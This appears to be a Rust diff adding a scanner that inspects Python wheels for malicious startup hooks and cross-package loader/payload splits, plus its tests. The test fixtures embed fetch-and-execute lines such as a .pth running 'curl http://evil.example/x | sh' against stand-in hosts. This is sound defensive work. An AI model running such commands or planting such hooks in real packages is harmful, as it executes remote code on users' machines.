+
+    // Re-open no-follow for the streaming archive read. The reader takes a
+    // Read + Seek handle and never buffers the whole file.
+    let mut archive_file = match util::open_read_no_follow_capped(path, ARTIFACT_MAX_FILE_SIZE) {
+        Ok(f) => f,
+        Err(_) => return Err(ArtifactInspectError::Unreadable),
+    };
+
+    // Magic sniff the leading bytes (bounded). We read a small prefix into a buffer,
+    // then seek back to 0 so the archive reader sees the whole file.
+    let magic = {
+        use std::io::{Read as _, Seek as _, SeekFrom};
+        let mut head = [0u8; 4];
+        let n = archive_file.read(&mut head).unwrap_or(0);
+        // Rewind for the archive reader regardless of how many bytes we got.
+        if archive_file.seek(SeekFrom::Start(0)).is_err() {
+            return Err(ArtifactInspectError::Unreadable);
+        }
+        sniff_magic(&head[..n])
+    };
+
+    let outer_name = path
+        .file_name()
+        .and_then(|n| n.to_str())
+        .unwrap_or("artifact")
+        .to_string();
+
+    match magic {
+        ArtifactMagic::Zip if is_wheel_filename(&outer_name) => {
+            inspect_wheel(archive_file, &outer_name, &outer_sha256)
+        }
+        // A `PK` magic but a non-`.whl` name is a generic zip: this milestone does
+        // not inspect generic archives as packages, so it is Unsupported (the A4
+        // reader could read it, but we do not claim package coverage for a plain
+        // zip here).
+        ArtifactMagic::Zip => Err(ArtifactInspectError::Unsupported),
+        // gzip / unknown: wheel-only milestone, so Unsupported (never a false claim
+        // of sdist coverage).
+        ArtifactMagic::Gzip | ArtifactMagic::Unknown => Err(ArtifactInspectError::Unsupported),
+    }
+}
+
+/// Inspect a wheel from an open `Read + Seek` handle: run the A4 reader with the
+/// capturing visitor, then fold the B5/B6/B7 analysis onto the inspection.
+fn inspect_wheel<R: std::io::Read + std::io::Seek>(
+    reader: R,
+    outer_name: &str,
+    outer_sha256: &str,
+) -> Result<InspectedArtifact, ArtifactInspectError> {
+    let mut visitor = CapturingVisitor::default();
+    let outcome = archive::read_wheel(
+        reader,
+        outer_name,
+        outer_sha256,
+        &archive::ArchiveLimits::default(),
+        &mut visitor,
+    );
+
+    let (mut inspection, rejected, violation_details) = match outcome {
+        ArchiveOutcome::Accepted(i) => (i, false, Vec::new()),
+        ArchiveOutcome::Rejected {
+            violations,
+            partial,
+        } => {
+            let details = violations.iter().map(describe_violation).collect();
+            (partial, true, details)
+        }
+    };
+
+    // B6: analyze each captured startup-hook body; B5: verify the wheel RECORD.
+    let mut native_findings: Vec<Finding> = Vec::new();
+    let mut record_entries_bytes: Option<Vec<u8>> = None;
+
+    for captured in &visitor.text {
+        match captured.kind {
+            ArtifactFileKind::PthFile
+            | ArtifactFileKind::StartFile
+            | ArtifactFileKind::SiteCustomize => {
+                fold_startup_member(&mut inspection, captured);
+            }
+            ArtifactFileKind::DistInfoMetadata => {
+                // The RECORD member (the only DistInfoMetadata member captured).
+                record_entries_bytes = Some(captured.bytes.clone());
+            }
+            _ => {}
+        }
+    }
+
+    // B5: wheel-RECORD verification against the inspection's hashed members.
+    let record = match &record_entries_bytes {
+        Some(bytes) => {
+            let text = String::from_utf8_lossy(bytes);
+            parse_record(&text).ok()
+        }
+        None => None,
+    };
+    // Only verify a wheel RECORD when the wheel actually has one (an absent RECORD
+    // would emit a spurious MissingRecord violation for a generic zip; for a real
+    // wheel a missing RECORD IS a finding, so we verify whenever the subject is a
+    // wheel artifact).
+    if matches!(inspection.subject, InspectionSubject::Artifact(_)) {
+        let result = verify_wheel_record(&inspection, record.as_deref());
+        inspection.signals.extend(result.signals);
+    }
+
+    // B7: triage each native handoff. The artifact path has no ownership index (a
+    // single wheel is its own distribution), so `known_malicious_indicator` is
+    // false here; the artifact-set path supplies cross-distribution corroboration.
+    for handoff in &visitor.native {
+        let triage = triage_native(handoff, false);
+        inspection.signals.extend(triage.signals);
+        inspection.execution_edges.extend(triage.edges);
+        if let Some(finding) = triage.finding {
+            native_findings.push(finding);
+        }
+    }
+
+    Ok(InspectedArtifact {
+        inspection,
+        native_findings,
+        rejected,
+        violation_details,
+    })
+}
+
+/// Fold one captured startup-hook member's B6 body analysis onto the inspection:
+/// the granular signals plus the execution edges (a cross-runtime edge when a
+/// foreign runtime is launched, and a generic import edge per executing line).
+fn fold_startup_member(inspection: &mut ArtifactInspection, captured: &CapturedMember) {
+    let kind = match captured.kind {
+        ArtifactFileKind::PthFile => StartupHookKind::Pth,
+        ArtifactFileKind::StartFile => StartupHookKind::Start,
+        ArtifactFileKind::SiteCustomize => StartupHookKind::SiteCustomize,
+        _ => return,
+    };
+    let body = String::from_utf8_lossy(&captured.bytes);
+    let analysis = pth::analyze_body(&body, &captured.location, kind);
+    inspection.signals.extend(analysis.signals);
+
+    if analysis.capabilities.cross_runtime {
+        inspection.execution_edges.push(ExecutionEdge {
+            from: captured.location.clone(),
+            trigger: ExecutionTrigger::CrossRuntimeInvocation,
+            to: SubjectLocation::default(),
+            mechanism: "startup hook launches a foreign language runtime (Bun/Node/Deno)"
+                .to_string(),
+            confidence: EdgeConfidence::High,
+        });
+    }
+    for line in &analysis.lines {
+        if line.class.executes() {
+            inspection.execution_edges.push(ExecutionEdge {
+                from: captured.location.clone(),
+                trigger: kind.trigger(),
+                to: SubjectLocation::default(),
+                mechanism: format!("startup line imports/executes: {}", line.text.trim()),
+                confidence: EdgeConfidence::Medium,
+            });
+        }
+    }
+}
+
+/// A short human description of a structural archive violation (for the rejected
+/// artifact's evidence / CLI output).
+fn describe_violation(v: &archive::ArchiveViolation) -> String {
+    use archive::ArchiveViolation as V;
+    match v {
+        V::PathTraversal { member } => format!("path traversal member: {member}"),
+        V::WindowsPathTraversal { member } => format!("windows-path member: {member}"),
+        V::DuplicatePath {
+            normalized,
+            first,
+            second,
+        } => format!("duplicate path '{normalized}' ({first} vs {second})"),
+        V::EncryptedMember { member } => format!("encrypted member: {member}"),
+        V::CrcMismatch { member } => format!("CRC mismatch: {member}"),
+        V::SymlinkMember { member, target } => format!("symlink member: {member} -> {target}"),
+        V::ConflictingDistInfo { roots } => {
+            format!("conflicting .dist-info roots: {}", roots.join(", "))
+        }
+        V::IdentityMismatch { detail } => format!("identity mismatch: {detail}"),
+        V::MalformedArchive { detail } => format!("malformed archive: {detail}"),
+    }
+}
+
+// ---------------------------------------------------------------------------
+// Artifact-set (cross-distribution) inspection
+// ---------------------------------------------------------------------------
+
+/// A two-pass inspection of a SET of artifacts, for cross-distribution
+/// loader/payload detection (criterion 5). Pass 1 inspects each wheel
+/// independently; pass 2 builds a virtual installation ownership map and resolves
+/// references/edges ACROSS artifacts, attaching each cross-distribution finding to
+/// the LOADER artifact while naming the payload.
+pub struct ArtifactSetInspection {
+    /// Each artifact's independent inspection (pass 1), in input order. A
+    /// per-artifact [`ArtifactInspectError`] (an unreadable / unsupported / oversize
+    /// member of the set) is recorded as a coverage gap rather than dropping the
+    /// whole set.
+    pub members: Vec<ArtifactSetMember>,
+    /// The cross-distribution findings (pass 2), each attached to the loader
+    /// artifact and naming the payload artifact. Reuses the existing RuleIds.
+    pub cross_findings: Vec<Finding>,
+    /// Coverage gaps for set members that could not be inspected (so a set is never
+    /// silently incomplete).
+    pub gaps: Vec<CoverageGap>,
+}
+
+/// One artifact in a set: its on-disk path and its independent inspection result.
+pub struct ArtifactSetMember {
+    /// The artifact's on-disk path.
+    pub path: PathBuf,
+    /// The independent inspection (pass 1).
+    pub inspected: InspectedArtifact,
+}
+
+impl ArtifactSetInspection {
+    /// Every finding in the set: each member's own signal-correlated + native
+    /// findings, plus the cross-distribution findings. Built by re-correlating each
+    /// member (so the per-member native findings are included) and appending the
+    /// cross findings; the caller finalizes this into ONE verdict.
+    pub fn all_findings(&self, threat_db: Option<&crate::threatdb::ThreatDb>) -> Vec<Finding> {
+        let mut findings: Vec<Finding> = Vec::new();
+        for m in &self.members {
+            findings.extend(crate::artifact::correlate::correlate_inspection_findings(
+                &m.inspected.inspection,
+                &m.inspected.native_findings,
+                threat_db,
+            ));
+        }
+        findings.extend(self.cross_findings.iter().cloned());
+        findings
+    }
+}
+
+/// Inspect a SET of artifact files for cross-distribution execution. Pass 1
+/// inspects each independently; pass 2 builds the virtual ownership map and
+/// correlates cross-artifact loader/payload splits.
+pub fn inspect_artifact_set(paths: &[PathBuf]) -> ArtifactSetInspection {
+    // ---- Pass 1: inspect every artifact independently ------------------------
+    let mut members: Vec<ArtifactSetMember> = Vec::new();
+    let mut gaps: Vec<CoverageGap> = Vec::new();
+    for path in paths {
+        match inspect_artifact_file(path) {
+            Ok(inspected) => members.push(ArtifactSetMember {
+                path: path.clone(),
+                inspected,
+            }),
+            Err(e) => gaps.push(CoverageGap {
+                location: SubjectLocation::from_path(path.clone()),
+                kind: e.gap_kind(),
+                sha256: None,
+            }),
+        }
+    }
+
+    // ---- Pass 2: virtual ownership map across all artifacts ------------------
+    // Each wheel's members become "installed" paths owned by that wheel's
+    // distribution identity, so a loader in wheel A that references a path owned by
+    // wheel B resolves across the set. The ownership KEY is the member path inside
+    // the wheel (the same forward-slash module path a `.pth`/import would name).
+    let mut index = OwnershipIndex::new();
+    for m in &members {
+        let Some(dist) = member_distribution_identity(&m.inspected) else {
+            continue;
+        };
+        for file in &m.inspected.inspection.files {
+            if let Some(member) = &file.location.member_path {
+                index.insert(NormalizedInstalledPath::new(member), dist.clone());
+            }
+        }
+    }
+
+    // ---- Pass 3/4: resolve cross-artifact references and correlate -----------
+    let cross_findings = correlate_cross_distribution(&members, &index);
+
+    ArtifactSetInspection {
+        members,
+        cross_findings,
+        gaps,
+    }
+}
+
+/// The distribution identity for a set member's inspection (for the virtual
+/// ownership map). A wheel artifact identity becomes a distribution identity keyed
+/// by its filename (the stable per-artifact identity in a set).
+fn member_distribution_identity(inspected: &InspectedArtifact) -> Option<DistributionIdentity> {
+    match &inspected.inspection.subject {
+        InspectionSubject::Artifact(a) => Some(DistributionIdentity {
+            ecosystem: a.ecosystem,
+            name: a.name.clone(),
+            version: a.version.clone(),
+            // No on-disk dist-info dir for an un-installed wheel; use the filename as
+            // the stable identity location so two artifacts are distinguishable.
+            dist_info_path: SubjectLocation::from_path(PathBuf::from(&a.filename)),
+        }),
+        _ => None,
+    }
+}
+
+/// Correlate cross-distribution execution across the set: a LOADER artifact whose
+/// startup hook (a `.pth`/`.start`/sitecustomize) searches `sys.path` and can run a
+/// PAYLOAD owned by a DIFFERENT artifact. The finding is attached to the loader and
+/// NAMES the payload, reusing the existing startup/native RuleIds (cross-cutting
+/// invariant 1: no new RuleId for the cross-artifact context).
+fn correlate_cross_distribution(
+    members: &[ArtifactSetMember],
+    index: &OwnershipIndex,
+) -> Vec<Finding> {
+    use crate::verdict::{Evidence, RuleId, Severity};
+    let mut findings: Vec<Finding> = Vec::new();
+
+    for loader in members {
+        let Some(loader_dist) = member_distribution_identity(&loader.inspected) else {
+            continue;
+        };
+        // A loader is interesting only if it has a startup hook that EXECUTES and
+        // searches sys.path (the mechanism that reaches another distribution's
+        // bundled payload). The B6 signals on the inspection encode this.
+        let has_sys_path_search = loader
+            .inspected
+            .inspection
+            .signals
+            .iter()
+            .any(|s| s.kind == ArtifactSignalKind::PthSysPathSearch);
+        let has_executing_line = loader
+            .inspected
+            .inspection
+            .signals
+            .iter()
+            .any(|s| s.kind == ArtifactSignalKind::PthExecutableLine);
+        if !(has_sys_path_search && has_executing_line) {
+            continue;
+        }
+
+        // Resolve which OTHER artifacts own a payload the loader could reach. We use
+        // the loader's executing startup lines as the reference set: any module-ish
+        // token they name that is owned by a DIFFERENT distribution in the set is a
+        // cross-distribution payload. To stay generic (a rename must not evade), we
+        // also treat ANY payload-shaped member (a script / native / wasm) owned by
+        // another distribution as reachable when the loader searches sys.path.
+        let payload_refs = resolve_cross_payloads(loader, &loader_dist, index, members);
+        if payload_refs.is_empty() {
+            continue;
+        }
+
+        // One finding per loader, naming every distinct payload artifact reached.
+        let payload_names: Vec<String> = payload_refs
+            .iter()
+            .map(|p| p.payload_artifact.clone())
+            .collect::<std::collections::BTreeSet<_>>()
+            .into_iter()
+            .collect();
+
+        let loader_name = loader
+            .inspected
+            .filename()
+            .unwrap_or("loader artifact")
+            .to_string();
+
+        let mut evidence: Vec<Evidence> = vec![Evidence::Text {
+            detail: format!(
+                "loader artifact '{loader_name}' bundles a startup hook that searches sys.path \
+                 and can execute a payload owned by another distribution in the set: {}",
+                payload_names.join(", ")
+            ),
+        }];
+        for r in &payload_refs {
+            evidence.push(Evidence::Text {
+                detail: format!(
+                    "{} -> {} (payload member: {})",
+                    r.loader_member, r.payload_artifact, r.payload_member
+                ),
+            });
+        }
+
+        // The cross-distribution split is the cross-runtime campaign mechanism; if
+        // the loader also launches a foreign runtime, it is the Critical
+        // cross-runtime case, else High suspicious. Either way it is attached to the
+        // loader and names the payload.
+        let loader_cross_runtime = loader
+            .inspected
+            .inspection
+            .execution_edges
+            .iter()
+            .any(|e| matches!(e.trigger, ExecutionTrigger::CrossRuntimeInvocation));
+
+        let (rule_id, severity) = if loader_cross_runtime {
+            (RuleId::PythonStartupHookCrossRuntime, Severity::Critical)
+        } else {
+            (RuleId::PythonStartupHookSuspicious, Severity::High)
+        };
+
+        findings.push(Finding {
+            rule_id,
+            severity,
+            title: "A startup hook executes a payload bundled in another distribution".to_string(),
+            description:
+                "Across the inspected artifact set, one distribution's startup hook searches \
+                 sys.path at interpreter start and can execute a payload bundled in a DIFFERENT \
+                 distribution. This is the cross-distribution loader/payload split used by the \
+                 live supply-chain campaign: the loader wheel looks benign in isolation, and the \
+                 payload wheel is never opened by a single-artifact scan. The finding is attached \
+                 to the loader artifact and names the payload artifact. The detection keys on the \
+                 sys.path-search + cross-distribution-ownership relationship, not on payload \
+                 filenames, so renaming the payload does not evade it. Do not install either \
+                 artifact until both are reviewed."
+                    .to_string(),
+            evidence,
+            human_view: None,
+            agent_view: None,
+            mitre_id: Some("T1546".to_string()),
+            custom_rule_id: None,
+        });
+    }
+
+    findings
+}
+
+/// A resolved cross-distribution payload reference: the loader member that reaches
+/// it, and the payload artifact + member it resolves to.
+struct CrossPayloadRef {
+    loader_member: String,
+    payload_artifact: String,
+    payload_member: String,
+}
+
+/// Resolve the payloads a loader can reach in OTHER distributions of the set. A
+/// loader that searches `sys.path` can run any payload-shaped member (a script,
+/// native module, or wasm) owned by a different distribution; we report each such
+/// member, naming its owning artifact. Generic by construction (no payload-filename
+/// allowlist), so a rename does not evade.
+fn resolve_cross_payloads(
+    loader: &ArtifactSetMember,
+    loader_dist: &DistributionIdentity,
+    _index: &OwnershipIndex,
+    members: &[ArtifactSetMember],
+) -> Vec<CrossPayloadRef> {
+    let mut refs: Vec<CrossPayloadRef> = Vec::new();
+
+    // The loader's executing startup lines (the reference site that names the
+    // sys.path search). We attribute the cross reference to the first executing
+    // startup member for the evidence.
+    let loader_member = loader
+        .inspected
+        .inspection
+        .signals
+        .iter()
+        .find(|s| s.kind == ArtifactSignalKind::PthExecutableLine)
+        .map(|s| s.location.to_string())
+        .unwrap_or_else(|| "loader startup hook".to_string());
+
+    for payload in members {
+        let Some(payload_dist) = member_distribution_identity(&payload.inspected) else {
+            continue;
+        };
+        // Skip the loader itself (a SAME-distribution member is not a
+        // cross-distribution split).
+        if same_distribution(loader_dist, &payload_dist) {
+            continue;
+        }
+        // Any payload-shaped member (script / native / wasm) owned by this other
+        // distribution is reachable by a sys.path-searching loader.
+        for file in &payload.inspected.inspection.files {
+            if is_payload_kind(file.kind) {
+                refs.push(CrossPayloadRef {
+                    loader_member: loader_member.clone(),
+                    payload_artifact: payload
+                        .inspected
+                        .filename()
+                        .unwrap_or("payload artifact")
+                        .to_string(),
+                    payload_member: file.location.to_string(),
+                });
+            }
+        }
+    }
+
+    refs
+}
+
+/// Whether a member kind is a PAYLOAD a cross-distribution loader could execute (a
+/// bundled script, native module, or wasm). Python source is intentionally NOT a
+/// payload kind here: a loader importing a sibling Python module is ordinary; the
+/// campaign's split hands off to a SCRIPT/native runtime, which is what we flag.
+fn is_payload_kind(kind: ArtifactFileKind) -> bool {
+    matches!(
+        kind,
+        ArtifactFileKind::Script | ArtifactFileKind::NativeModule | ArtifactFileKind::WasmModule
+    )
+}
+
+/// Whether two distribution identities are the same artifact in a set (same name +
+/// same identity location).
+fn same_distribution(a: &DistributionIdentity, b: &DistributionIdentity) -> bool {
+    a.name == b.name && a.dist_info_path == b.dist_info_path
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use std::io::Write as _;
+    use zip::write::SimpleFileOptions;
+    use zip::ZipWriter;
+
+    /// Build an in-memory wheel zip from (member, body) pairs.
+    fn build_wheel(members: &[(&str, &[u8])]) -> Vec<u8> {
+        let mut zw = ZipWriter::new(std::io::Cursor::new(Vec::new()));
+        for (name, body) in members {
+            zw.start_file(*name, SimpleFileOptions::default()).unwrap();
+            zw.write_all(body).unwrap();
+        }
+        zw.finish().unwrap().into_inner()
+    }
+
+    /// Write `bytes` to a temp file named `name`, returning the path (and keeping
+    /// the tempdir alive via the returned guard).
+    fn write_temp(dir: &tempfile::TempDir, name: &str, bytes: &[u8]) -> PathBuf {
+        let p = dir.path().join(name);
+        std::fs::write(&p, bytes).unwrap();
+        p
+    }
+
+    #[test]
+    fn sniff_recognizes_zip_and_gzip() {
+        assert_eq!(sniff_magic(b"PK\x03\x04rest"), ArtifactMagic::Zip);
+        assert_eq!(sniff_magic(b"PK\x05\x06"), ArtifactMagic::Zip);
+        assert_eq!(sniff_magic(&[0x1f, 0x8b, 0x08, 0x00]), ArtifactMagic::Gzip);
+        assert_eq!(sniff_magic(b"not a zip"), ArtifactMagic::Unknown);
+        assert_eq!(sniff_magic(b""), ArtifactMagic::Unknown);
+    }
+
+    #[test]
+    fn clean_wheel_inspects_to_no_findings() {
+        let dir = tempfile::tempdir().unwrap();
+        let bytes = build_wheel(&[
+            ("demo/__init__.py", b"print('hi')\n"),
+            (
+                "demo-1.0.dist-info/METADATA",
+                b"Metadata-Version: 2.1\nName: demo\nVersion: 1.0\n\n",
+            ),
+            ("demo-1.0.dist-info/WHEEL", b"Wheel-Version: 1.0\n"),
+            (
+                "demo-1.0.dist-info/RECORD",
+                b"demo/__init__.py,sha256=2Vn9kQq8iDQA4F1pHbZ5gQ7Hq6oq7e8gWQ1xMrr0vY,12\n\
+                  demo-1.0.dist-info/RECORD,,\n",
+            ),
+        ]);
+        let path = write_temp(&dir, "demo-1.0-py3-none-any.whl", &bytes);
+        let inspected = inspect_artifact_file(&path).expect("inspect");
+        assert!(!inspected.rejected, "a clean wheel is not rejected");
+        // The clean wheel has a (deliberately wrong) RECORD hash above to keep the
+        // test self-contained; the IMPORTANT invariant is no startup/native finding.
+        let findings = crate::artifact::correlate::correlate_inspection_findings(
+            &inspected.inspection,
+            &inspected.native_findings,
+            None,
+        );
+        assert!(
+            findings.iter().all(|f| f.rule_id
+                != crate::verdict::RuleId::PythonStartupHookSuspicious
+                && f.rule_id != crate::verdict::RuleId::NativeImportExecutionChain),
+            "clean wheel must not fire startup/native findings: {findings:?}"
+        );
+    }
+
+    #[test]
+    fn unsupported_sdist_is_unsupported_error() {
+        let dir = tempfile::tempdir().unwrap();
+        // gzip magic, named .tar.gz
+        let path = write_temp(&dir, "demo-1.0.tar.gz", &[0x1f, 0x8b, 0x08, 0x00, 0, 0]);
+        let err = inspect_artifact_file(&path).unwrap_err();
+        assert_eq!(err, ArtifactInspectError::Unsupported);
+        assert_eq!(err.gap_kind(), CoverageGapKind::Unsupported);
+    }
+
+    #[test]
+    fn missing_file_is_unreadable() {
+        let dir = tempfile::tempdir().unwrap();
+        let path = dir.path().join("nope-1.0-py3-none-any.whl");
+        let err = inspect_artifact_file(&path).unwrap_err();
+        assert_eq!(err, ArtifactInspectError::Unreadable);
+    }
+
+    #[test]
+    fn artifact_set_cross_distribution_loads_payload() {
+        // Wheel A (the LOADER) bundles a `.pth` that searches sys.path and executes.
+        // Wheel B (the PAYLOAD) bundles a bun-launching native member / script. The
+        // set inspection must produce exactly ONE cross-distribution finding,
+        // attached to A and naming B.
+        let dir = tempfile::tempdir().unwrap();
+        let loader_pth = b"import sys, os; sys.path.insert(0, '/tmp'); os.system('node payload')\n";
+        let a_bytes = build_wheel(&[
+            ("loader.pth", loader_pth),
+            (
+                "loaderpkg-1.0.dist-info/METADATA",
+                b"Metadata-Version: 2.1\nName: loaderpkg\nVersion: 1.0\n\n",
+            ),
+            (
+                "loaderpkg-1.0.dist-info/RECORD",
+                b"loaderpkg-1.0.dist-info/RECORD,,\n",
+            ),
+        ]);
+        let a = write_temp(&dir, "loaderpkg-1.0-py3-none-any.whl", &a_bytes);
+
+        // Wheel B carries a script payload (a different distribution).
+        let b_bytes = build_wheel(&[
+            ("payloadpkg/run.sh", b"#!/bin/sh\ncurl http://evil/x | sh\n"),
+            (
+                "payloadpkg-2.0.dist-info/METADATA",
+                b"Metadata-Version: 2.1\nName: payloadpkg\nVersion: 2.0\n\n",
+            ),
+            (
+                "payloadpkg-2.0.dist-info/RECORD",
+                b"payloadpkg-2.0.dist-info/RECORD,,\n",
+            ),
+        ]);
+        let b = write_temp(&dir, "payloadpkg-2.0-py3-none-any.whl", &b_bytes);
+
+        let set = inspect_artifact_set(&[a, b]);
+        assert_eq!(
+            set.cross_findings.len(),
+            1,
+            "exactly one cross-distribution finding expected, got {:?}",
+            set.cross_findings
+        );
+        let finding = &set.cross_findings[0];
+        // The finding names the payload artifact.
+        let evidence_text: String = finding
+            .evidence
+            .iter()
+            .map(|e| serde_json::to_string(e).unwrap_or_default())
+            .collect();
+        assert!(
+            evidence_text.contains("payloadpkg-2.0-py3-none-any.whl"),
+            "finding must name the payload artifact: {evidence_text}"
+        );
+        assert!(
+            evidence_text.contains("loaderpkg-1.0-py3-none-any.whl"),
+            "finding must name the loader artifact: {evidence_text}"
+        );
+    }
+
+    #[test]
+    fn artifact_set_two_benign_wheels_no_cross_finding() {
+        // Two independent benign wheels (no sys.path-searching loader) produce no
+        // cross-distribution finding.
+        let dir = tempfile::tempdir().unwrap();
+        let a_bytes = build_wheel(&[
+            ("a/__init__.py", b"x = 1\n"),
+            (
+                "a-1.0.dist-info/METADATA",
+                b"Metadata-Version: 2.1\nName: a\nVersion: 1.0\n\n",
+            ),
+            ("a-1.0.dist-info/RECORD", b"a-1.0.dist-info/RECORD,,\n"),
+        ]);
+        let a = write_temp(&dir, "a-1.0-py3-none-any.whl", &a_bytes);
+        let b_bytes = build_wheel(&[
+            ("b/run.sh", b"#!/bin/sh\necho hi\n"),
+            (
+                "b-1.0.dist-info/METADATA",
+                b"Metadata-Version: 2.1\nName: b\nVersion: 1.0\n\n",
+            ),
+            ("b-1.0.dist-info/RECORD", b"b-1.0.dist-info/RECORD,,\n"),
+        ]);
+        let b = write_temp(&dir, "b-1.0-py3-none-any.whl", &b_bytes);
+        let set = inspect_artifact_set(&[a, b]);
+        assert!(
+            set.cross_findings.is_empty(),
+            "two benign wheels must not cross-correlate: {:?}",
+            set.cross_findings
+        );
+    }
+
+    #[test]
+    fn wheel_with_executable_pth_fires_suspicious() {
+        let dir = tempfile::tempdir().unwrap();
+        // A .pth that executes a subprocess at startup (the B6 case).
+        let pth = b"import os; os.system('curl http://evil.example/x | sh')\n";
+        let bytes = build_wheel(&[
+            ("evil.pth", pth),
+            (
+                "demo-1.0.dist-info/METADATA",
+                b"Metadata-Version: 2.1\nName: demo\nVersion: 1.0\n\n",
+            ),
+            (
+                "demo-1.0.dist-info/RECORD",
+                b"demo-1.0.dist-info/RECORD,,\n",
+            ),
+        ]);
+        let path = write_temp(&dir, "demo-1.0-py3-none-any.whl", &bytes);
+        let inspected = inspect_artifact_file(&path).expect("inspect");
+        let findings = crate::artifact::correlate::correlate_inspection_findings(
+            &inspected.inspection,
+            &inspected.native_findings,
+            None,
+        );
+        assert!(
+            findings
+                .iter()
+                .any(|f| f.rule_id == crate::verdict::RuleId::PythonStartupHookSuspicious),
+            "an executable .pth must fire the suspicious startup finding: {findings:?}"
+        );
+    }
+}

--- a/crates/tirith-core/src/artifact/inspect.rs
+++ b/crates/tirith-core/src/artifact/inspect.rs
@@ -40,7 +40,7 @@ use crate::artifact::archive::{
 };
 use crate::artifact::native::triage_native;
 use crate::artifact::pth::{self, StartupHookKind};
-use crate::artifact::record::{verify_wheel_record, NormalizedInstalledPath, OwnershipIndex};
+use crate::artifact::record::verify_wheel_record;
 use crate::artifact::wheel::parse_record;
 use crate::artifact::{
     ArtifactFileKind, ArtifactInspection, ArtifactSignalKind, DistributionIdentity, EdgeConfidence,
@@ -480,25 +480,12 @@ pub fn inspect_artifact_set(paths: &[PathBuf]) -> ArtifactSetInspection {
         }
     }
 
-    // ---- Pass 2: virtual ownership map across all artifacts ------------------
-    // Each wheel's members become "installed" paths owned by that wheel's
-    // distribution identity, so a loader in wheel A that references a path owned by
-    // wheel B resolves across the set. The ownership KEY is the member path inside
-    // the wheel (the same forward-slash module path a `.pth`/import would name).
-    let mut index = OwnershipIndex::new();
-    for m in &members {
-        let Some(dist) = member_distribution_identity(m) else {
-            continue;
-        };
-        for file in &m.inspected.inspection.files {
-            if let Some(member) = &file.location.member_path {
-                index.insert(NormalizedInstalledPath::new(member), dist.clone());
-            }
-        }
-    }
-
-    // ---- Pass 3/4: resolve cross-artifact references and correlate -----------
-    let cross_findings = correlate_cross_distribution(&members, &index);
+    // ---- Resolve cross-artifact references and correlate ---------------------
+    // The cross-distribution correlation walks the members directly (every
+    // payload-shaped member of another distribution is treated as reachable when a
+    // loader searches sys.path); it does not consult an ownership map, so none is
+    // built here.
+    let cross_findings = correlate_cross_distribution(&members);
 
     ArtifactSetInspection {
         members,
@@ -534,10 +521,7 @@ fn member_distribution_identity(member: &ArtifactSetMember) -> Option<Distributi
 /// PAYLOAD owned by a DIFFERENT artifact. The finding is attached to the loader and
 /// NAMES the payload, reusing the existing startup/native RuleIds (cross-cutting
 /// invariant 1: no new RuleId for the cross-artifact context).
-fn correlate_cross_distribution(
-    members: &[ArtifactSetMember],
-    index: &OwnershipIndex,
-) -> Vec<Finding> {
+fn correlate_cross_distribution(members: &[ArtifactSetMember]) -> Vec<Finding> {
     use crate::verdict::{Evidence, RuleId, Severity};
     let mut findings: Vec<Finding> = Vec::new();
 
@@ -570,7 +554,7 @@ fn correlate_cross_distribution(
         // cross-distribution payload. To stay generic (a rename must not evade), we
         // also treat ANY payload-shaped member (a script / native / wasm) owned by
         // another distribution as reachable when the loader searches sys.path.
-        let payload_refs = resolve_cross_payloads(loader, &loader_dist, index, members);
+        let payload_refs = resolve_cross_payloads(loader, &loader_dist, members);
         if payload_refs.is_empty() {
             continue;
         }
@@ -672,7 +656,6 @@ struct CrossPayloadRef {
 fn resolve_cross_payloads(
     loader: &ArtifactSetMember,
     loader_dist: &DistributionIdentity,
-    _index: &OwnershipIndex,
     members: &[ArtifactSetMember],
 ) -> Vec<CrossPayloadRef> {
     let mut refs: Vec<CrossPayloadRef> = Vec::new();

--- a/crates/tirith-core/src/artifact/mod.rs
+++ b/crates/tirith-core/src/artifact/mod.rs
@@ -461,12 +461,13 @@ impl InspectionCoverage {
 /// severity overrides and `action_overrides` are honored at this verdict site,
 /// exactly like `ecosystem_scan` (cross-cutting invariant 5).
 ///
-/// In A3 there are no analyzers and no artifact-specific
-/// [`crate::verdict::RuleId`]s yet, so the signal-to-finding correlation is a
-/// skeleton: it produces no findings. The real correlation (and the
-/// artifact RuleIds it emits) lands with the analyzers in B5 to B8. The
-/// `threat_db` is threaded now so later PRs can resolve hashes/names without a
-/// signature change.
+/// The signal-to-finding correlation is delegated to
+/// [`crate::artifact::correlate::correlate_inspection_findings`] (wired in B8),
+/// which maps the B5/B6 signal sets to their artifact RuleIds and applies the
+/// DB-gated `ArtifactKnownMalicious` hash check; a clean inspection yields no
+/// findings. The `threat_db` is threaded so the hash lookups resolve without a
+/// signature change. The per-member native chains (B7) are folded in by
+/// [`evaluate_inspected_artifact`], not by this bare-inspection entry point.
 pub fn evaluate_artifact(
     inspection: &ArtifactInspection,
     policy: &Policy,

--- a/crates/tirith-core/src/artifact/mod.rs
+++ b/crates/tirith-core/src/artifact/mod.rs
@@ -82,6 +82,16 @@ pub mod pth;
 /// [`crate::verdict::RuleId::NativeImportExecutionChain`].
 pub mod native;
 
+/// Correlate an artifact inspection's signals/edges into user-facing findings (PR
+/// B8): the wheel/sdist counterpart of the installed-tree correlation, reusing the
+/// same RuleIds. Holds the DB-gated, feature-gated `ArtifactKnownMalicious` seam.
+pub mod correlate;
+
+/// Artifact I/O entry points (PR B8): inspect a wheel/sdist file (magic sniff ->
+/// A4 reader -> B5/B6/B7 analyzers) and inspect an artifact SET for
+/// cross-distribution loader/payload splits across multiple wheels.
+pub mod inspect;
+
 /// Schema version for the serialized [`ArtifactInspection`]. Bump when the wire
 /// shape changes incompatibly; a consumer calls
 /// [`ArtifactInspection::check_schema`] before trusting a deserialized value.
@@ -468,17 +478,42 @@ pub fn evaluate_artifact(
     crate::escalation::finalize_static_verdict(findings, policy, 3, Timings::default())
 }
 
+/// Evaluate an inspection that also carries the per-member native-chain findings
+/// (B7) the byte inspection produced. Identical to [`evaluate_artifact`] except it
+/// folds `native_findings` in alongside the signal-correlated findings, so a wheel
+/// whose `.so` formed a [`crate::verdict::RuleId::NativeImportExecutionChain`]
+/// blocks. The [`crate::artifact::inspect`] path uses this; a caller with only an
+/// inspection (and no native findings) uses [`evaluate_artifact`].
+pub fn evaluate_inspected_artifact(
+    inspection: &ArtifactInspection,
+    native_findings: &[Finding],
+    policy: &Policy,
+    threat_db: Option<&ThreatDb>,
+) -> Verdict {
+    let findings = crate::artifact::correlate::correlate_inspection_findings(
+        inspection,
+        native_findings,
+        threat_db,
+    );
+    crate::escalation::finalize_static_verdict(findings, policy, 3, Timings::default())
+}
+
 /// Correlate the inspection's signals/edges into user-facing findings.
 ///
